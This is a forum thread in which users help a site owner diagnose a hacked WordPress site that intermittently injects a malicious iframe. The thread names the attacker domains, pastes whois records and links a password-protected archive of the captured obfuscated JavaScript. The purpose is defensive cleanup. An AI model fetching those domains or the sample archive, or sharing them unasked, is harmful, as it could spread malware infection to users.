Page 1 of 1
Someone reported a Virus when visiting my site
Posted: Wed Mar 06, 2013 4:37 pm
by hac2500
My clients site is
http://homelessactioncenter.org/
A user to the site reported a js.cryptic.afa trojan virus that "started an automatic download" when they visited the site. I looked over all of the files on the server and synchronised them with my local copies to see if any had been changes or added and I did not see any. I Updated Wordpress and removed a few orphaned files from the Media Library and asked the user to visit the site again and see if they got the virus warning. They did not.
I ran the site thru
http://www.avgthreatlabs.com/sitereport ... avg.com.au and they found 0 threats.
All of the passwords for the site a very strong so I doubt they were hacked. What should I do next?
Re: Someone reported a Virus when visiting my site
Posted: Wed Mar 06, 2013 11:38 pm
by toast0
Something is inserting iframes into your site. I too got the warning when i visited the site, view source showed a javascript iframe insertion, but not when reloading or from a fresh browser. So I hit the page 100 times with wget (from a different IP, with a fake Firefox user agent). The first request also got a javascript iframe insertion, but the other 99 times were clean.
Fetching the iframe url doesn't work unless a user agent and referer header are sent; when it is fetched there's a java applet load as well as some severely obfuscated javascript. After I downloaded it once, the iframe url is giving me 500's again; these guys are sneaky (or their servers are very unreliable).
This looks similar to this
https://www.securelist.com/en/blog/2081 ... Injections, but there have also been some wordpress vulnerabilities lately too. You probably should contact
[email protected]; this is Sonic hosting right?
Re: Someone reported a Virus when visiting my site
Posted: Wed Mar 06, 2013 11:47 pm
by toast0
I captured the altered html and the iframe html if you want to take a look; the applet I got was 0 bytes long, I'm not sure if that's the intent and the long ugly javascript does the dirty work or what.
http://ruka.org/~toast/iframes.zip zipfile password is dangerous (because the files are dangerous... i did save them as .txt though)
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 3:04 am
by gack
I also attempted to issue a wget but the iframe's domain changed from yours:
instead of lovehiilda85.us.to it now goes to bllackthere89.us.to. lovehiilda85.us.to is no longer valid.
Name: bllackthere89.us.to
Address: 173.236.50.234
http://whois.arin.net/rest/net/NET-173-236-0-0-1/pft
Code: Select all
Network
NetRange 173.236.0.0 - 173.236.127.255
CIDR 173.236.0.0/17
Name SINGLEHOP
Handle NET-173-236-0-0-1
Parent NET173 (NET-173-0-0-0-0)
Net Type Direct Allocation
Origin AS AS32475
Organization SingleHop, Inc. (SINGL-8)
Registration Date 2010-03-23
Last Updated 2012-03-02
Comments
RESTful Link http://whois.arin.net/rest/net/NET-173-236-0-0-1
Function Point of Contact
Tech NETWO1546-ARIN (NETWO1546-ARIN)
NOC NETWO1546-ARIN (NETWO1546-ARIN)
Abuse ABUSE2492-ARIN (ABUSE2492-ARIN)
See Also Related organization's POC records.
See Also Related delegations.
Organization
Name SingleHop, Inc.
Handle SINGL-8
Street 215 W. Ohio St.
5th Floor
City Chicago
State/Province IL
Postal Code 60654
Country US
Registration Date 2007-03-07
Last Updated 2012-11-19
Comments http://www.singlehop.com/
RESTful Link http://whois.arin.net/rest/org/SINGL-8
Referral Server rwhois://rwhois.singlehop.net:4321
Function Point of Contact
NOC NETWO1546-ARIN (NETWO1546-ARIN)
Admin ZDB1-ARIN (ZDB1-ARIN)
Abuse ABUSE2492-ARIN (ABUSE2492-ARIN)
Tech NETWO1546-ARIN (NETWO1546-ARIN)
Point of Contact
Name Network Operations
Handle NETWO1546-ARIN
Company SingleHop LLC
Street 215 W Ohio St Flr 5
City Chicago
State/Province IL
Postal Code 60654
Country US
Registration Date 2007-02-15
Last Updated 2012-11-19
Comments
Phone +1-866-817-2811 (Office)
Email [email protected]
RESTful Link http://whois.arin.net/rest/poc/NETWO1546-ARIN
Point of Contact
Note ARIN has attempted to validate the data for this POC, but has received no response from the POC since 2010-12-03
Name Boca , Zachary D
Handle ZDB1-ARIN
Company midPhase, Inc
Street 223 West Jackson Suite 600
City Chicago
State/Province IL
Postal Code 60606
Country US
Registration Date 2006-10-10
Last Updated 2009-12-03
Comments
Phone +1-312-386-1640 (Office)
Email [email protected]
RESTful Link http://whois.arin.net/rest/poc/ZDB1-ARIN
Point of Contact
Name Abuse Department
Handle ABUSE2492-ARIN
Company SingleHop, Inc.
Street 621 W. Randolph
3rd Floor
City Chicago
State/Province IL
Postal Code 60661
Country US
Registration Date 2009-12-03
Last Updated 2011-12-06
Comments
Phone +1-866-817-2811 (Office)
Email [email protected]
RESTful Link http://whois.arin.net/rest/poc/ABUSE2492-ARIN
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 10:18 am
by hac2500
I actually contacted Sonic support first and they referred me here. How would I go about removing this?
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 11:03 am
by hac2500
Thanks allot for the help BTW!!
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 12:49 pm
by williamt
Hi hac2500,
I have removed the infected code from your site. I'm not 100% sure on how it got there in the first place but I suspect the current theme you are using is vulnerable to attacks.
I would recommend switching or upgrading your theme to one that instant vulnerable.
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 1:27 pm
by hac2500
Thanks William! It is a customized twentyten theme which was the default theme back in 2010 when the site was built. Just the CSS has been altered. Do you think I need to use a different theme?
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 1:31 pm
by williamt
I would check if there is an update to it. First. If not I would probably switch themes.
Re: Someone reported a Virus when visiting my site
Posted: Tue Mar 12, 2013 10:33 pm
by virtualmike
From Google's Webmaster Central Blog...
New first stop for hacked site recovery
We certainly hope you never have to use our new Help for hacked sites informational series. It's a dozen articles and over an hour of videos dedicated to helping webmasters in the unfortunate event that their site is compromised.